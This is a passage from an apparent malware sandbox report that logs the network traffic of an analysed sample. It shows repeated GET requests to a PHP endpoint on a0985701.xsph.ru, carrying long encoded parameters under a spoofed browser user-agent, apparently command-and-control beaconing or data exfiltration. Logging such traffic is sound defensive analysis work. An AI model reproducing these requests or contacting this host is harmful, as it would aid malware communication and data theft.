MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKN